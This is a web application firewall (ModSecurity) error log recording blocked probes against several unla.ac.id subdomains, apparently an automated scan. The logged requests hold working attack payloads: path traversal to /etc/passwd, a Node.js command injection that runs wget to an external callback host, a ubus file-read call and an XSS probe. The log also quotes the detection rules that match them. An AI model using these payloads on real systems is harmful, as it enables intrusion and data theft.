[Tue Aug 29 11:44:18.408030 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfWN1oAAAAL"]
[Tue Aug 29 11:44:18.427894 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfVkZkAAAAD"]
[Tue Aug 29 11:44:18.428762 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13osCo-f0AAAfWN1sAAAAL"]
[Tue Aug 29 11:44:19.380789 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAfZj34AAAAN"]
[Tue Aug 29 11:44:19.403692 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:fileName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/downloads"] [unique_id "ZO13o8Co-f0AAAfVkZwAAAAD"]
[Tue Aug 29 11:44:20.373122 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gm8o6hw8ahb86o.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfiYmkAAAAg"]
[Tue Aug 29 11:44:20.387454 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gcbcrtkptoxefa.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAenGf0AAAAM"]
[Tue Aug 29 11:44:20.423589 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gtu7df5ebhzuyb.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAdxUeQAAAAC"]
[Tue Aug 29 11:44:20.448295 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gjt51ekbc85fsh.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAdQ3qkAAAAV"]
[Tue Aug 29 11:44:20.464070 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26ghz3wrj3h6rdig.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13pMCo-f0AAAfGacIAAAAT"]
[Tue Aug 29 11:44:21.373100 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:defaultFilter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:defaultFilter: e');var require=global.require || global.process.mainModule.constructor._load; require('child_process').exec('wget http:/cjmnbitjmimt14dgn26gqmg9mdcx4dr3w.oast.site');/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13pcCo-f0AAAfSWawAAAAB"]
[Tue Aug 29 11:44:23.473245 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdfth8AAAAG"]
[Tue Aug 29 11:44:23.564048 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAfcoP0AAAAa"]
[Tue Aug 29 11:44:23.571435 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAfiYnUAAAAg"]
[Tue Aug 29 11:44:23.580136 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAdOea0AAAAS"]
[Tue Aug 29 11:44:23.581233 2023] [:error] [pid 2021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13p8Co-f0AAAfloS0AAAAj"]
[Tue Aug 29 11:44:24.431709 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x22jsonrpc\\x22:\\x222.0\\x22,\\x22id\\x22:3,\\x22method\\x22:\\x22call\\x22,\\x22params\\x22:[\\x224183f72884a98d7952d953dd9439a1d1\\x22,\\x22file\\x22,\\x22read\\x22,{\\x22path\\x22:\\x22/etc/passwd\\x22}]}: {jsonrpc:2.0 id:3 method:call params:[4183f72884a98d7952d953dd9439a1d1 file read {path:/etc/passwd}]}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/ubus/"] [unique_id "ZO13qMCo-f0AAAfg7xsAAAAe"]
[Tue Aug 29 11:44:26.363180 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfWN2wAAAAL"]
[Tue Aug 29 11:44:26.402827 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfSWbYAAAAB"]
[Tue Aug 29 11:44:26.415706 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAgzyOMAAAAF"]
[Tue Aug 29 11:44:26.419268 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAdOebcAAAAS"]
[Tue Aug 29 11:44:26.421595 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:k. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:k: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/blogroll-fun/blogroll.php"] [unique_id "ZO13qsCo-f0AAAfg7x8AAAAe"]
[Tue Aug 29 11:44:27.375207 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfZj40AAAAN"]
[Tue Aug 29 11:44:27.377241 2023] [:error] [pid 2005] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfVkacAAAAD"]
[Tue Aug 29 11:44:27.387796 2023] [:error] [pid 1984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfAOccAAAAH"]
[Tue Aug 29 11:44:27.387843 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAe3@CgAAAAA"]
[Tue Aug 29 11:44:27.395422 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13q8Co-f0AAAfGadAAAAAT"]
